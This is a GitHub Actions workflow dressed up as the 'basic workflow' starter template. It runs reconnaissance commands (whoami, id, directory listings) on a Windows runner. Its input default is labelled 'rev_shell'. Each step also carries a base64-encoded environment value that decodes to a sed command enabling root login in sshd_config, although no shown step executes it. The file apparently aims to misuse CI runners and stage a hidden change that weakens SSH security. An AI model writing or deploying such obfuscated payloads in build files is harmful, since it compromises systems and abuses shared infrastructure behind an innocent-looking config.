# This is a basic workflow to help you get started with Actions

name: CI_2023_0120

# Controls when the workflow will run
on:
    # Triggers the workflow on push or pull request events but only for the main branch
  # Allows you to run this workflow manually from the Actions tab
  workflow_dispatch:
    inputs:
      name77:
        description: 'PersonDesc'
        required: true
        default: 'AABBCC_rev_shell'

    
# A workflow run is made up of one or more jobs that can run sequentially or in parallel
jobs:
  # This workflow contains a single job called "build"
  build_jobs3:
    # The type of runner that the job will run on
    runs-on: "windows-2019"
    

    # Steps represent a sequence of tasks that will be executed as part of the job
    steps:
      # Checks-out your repository under $GITHUB_WORKSPACE, so your job can access it
      - uses: actions/checkout@v2


      - name: Run a one-line script
        run:  "choco install busybox ;whoami;busybox id;"
        env:
          ss0: "c2VkIC1pICJzL14jXD9cKFBlcm1pdFJvb3RMb2dpblwpL1wxIHllcyMvZyIgL2V0Yy9zc2gvc3NoZF9jb25maWc7"
      # Runs a set of commands using the runners shell \"C:/Program Files/Git/bin/"
      - name: Run a 2-line script
        run:  "choco -V&&busybox&&busybox pwd&&dir &&dir .. &&dir ../.. "
        env:
          ss0: "c2VkIC1pICJzL14jXD9cKFBlcm1pdFJvb3RMb2dpblwpL1wxIHllcyMvZyIgL2V0Yy9zc2gvc3NoZF9jb25maWc7" 
